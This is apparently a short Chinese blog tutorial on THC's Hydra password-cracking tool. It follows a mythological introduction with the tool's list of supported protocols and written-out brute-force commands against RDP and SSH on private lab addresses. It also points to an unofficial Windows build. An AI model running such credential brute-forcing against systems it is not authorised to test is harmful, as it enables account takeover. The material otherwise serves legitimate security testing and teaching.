Hydra(九头蛇海德拉)是希腊神话之中的一个怪兽,以九个头闻名于世。 拥有九颗头,其中一颗头要是被斩断,立刻又会生出两颗头来。赫克力士运用他的智慧,成功地击败了巨大水蛇海德拉。它是西方神话中的生物,在古希腊神话中出现最为频繁,但《波斯古经》、《圣经》、非洲传说、中国神话里也可以看到其变体和影子。
hydra是黑客组织thc的一款开源密码攻击工具,功能十分强大,支持多种协议的破解,点击运行终端执行hydra -h可以看到详细介绍Supported services: asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get}http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp
其中rdp就是远程桌面协议
hydra 192.168.1.12 rdp -L users.txt -P pass.txt -V 192.168.12是目标服务器的IP地址 rdp 是协议 -L 指定一个帐号字典 -P 指定一个密码字典 -V 现实爆破测试的详细过程
破解ssh
hydra -l root -P passwoed.txt -t 6 ssh://172.25.0.11 -V
hydra好像从8.0以后就没有windows版了,不过今天总算找了个8.1版本的,windows版hydra 提取码:qxvd